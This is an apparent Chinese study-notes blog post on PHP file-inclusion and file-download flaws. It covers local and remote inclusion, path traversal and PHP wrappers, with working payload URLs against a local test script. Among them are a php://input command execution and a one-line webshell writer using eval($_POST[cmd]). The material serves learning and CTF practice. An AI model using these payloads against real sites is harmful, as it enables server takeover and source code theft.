偷工减料笔记10(文件包含)

总结:文件包含的一些学习,文件包含就是包括了三种情况,一种是执行对应的目录代码,这个就是可以的理解成解析漏洞,一个是下载里面的内容,一个就是直接读取内容(文件包含->解析 文件下载->下载内容 文件读取->读取源码),伪协议重要一些我感觉难点:发现漏洞->看参数看功能 难点:利用->伪协议和对应的中间件的配置文件比如javaweb的web-inf等等,这个是要看对应的中间件去找对应的一些配置的文件里面有一些重要信息可以看,在用伪协议来利用

伪协议讲解【简单理解就是功能文件头+过滤器+内容】

文件包含分俩种:一种本地包含,一种远程包含

本地包含:顾名思义,就是包含本地的文件,一般的用途就是可以查看到这个目录下的信息,也可以像目录穿越一样去找别的文件,找到配置文件等等重要文件后续发展:)

eg.

http://127.0.0.1:8080/include.php?filename=1.txt
http://127.0.0.1:8080/include.php?filename=../../../www.txt

这里用到的一些技巧:【有些网站就会在文件页面强行给你加个 .html 这个时候这些技巧就排上用处了】

远程文件包含:这个就是可以包含远程的文件咯,前提条件是 allow_url_include必需打开

这个

eg.

http://127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt
http://127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%20
http://127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%23
http://127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt?

伪协议玩法:看伪协议的讲解实战中这个应该才是有用的

php://input这个是执行命令

php://filter这个是读取

用命令可以读取目录,再去读取,可以获得flag这个是ctf的考点

http://127.0.0.1:8080/include.php?filename=php://filter/convert.base64-encode/resource=1.txt
http://127.0.0.1:8080/include.php?filename=php://input Post:<?php system('ver')?>
<?PHP fputs(fopen('s.php','w'),'<?php @eval($_POST[cmd])?>');?>
http://127.0.0.1:8080/include.php?filename=file:///D:/phpstudy/PHPTutorial/WWW/1.txt
http://127.0.0.1:8080/include.php?filename=data://text/plain,<?php%20phpinfo();?>

文件包含原理:将文件当成php执行【相当于解析php】

文件下载:文件包含的另一种形式,可以这么说,我们访问一个目录的东西时,如果它是代码那就执行处页面给我们看,如果是压缩包等可以下载的那就会自动帮我们下载,所以其实就是执行目录的内容

文件下载的利用:下载重要的东西然后看咯,比方一些配置文件什么的

发现文件下载的漏洞思路:一个是看url参数的样子,一个就是看功能

 功能的话回顾一下当贝的apk在下的例子

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

唯熟唯尔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值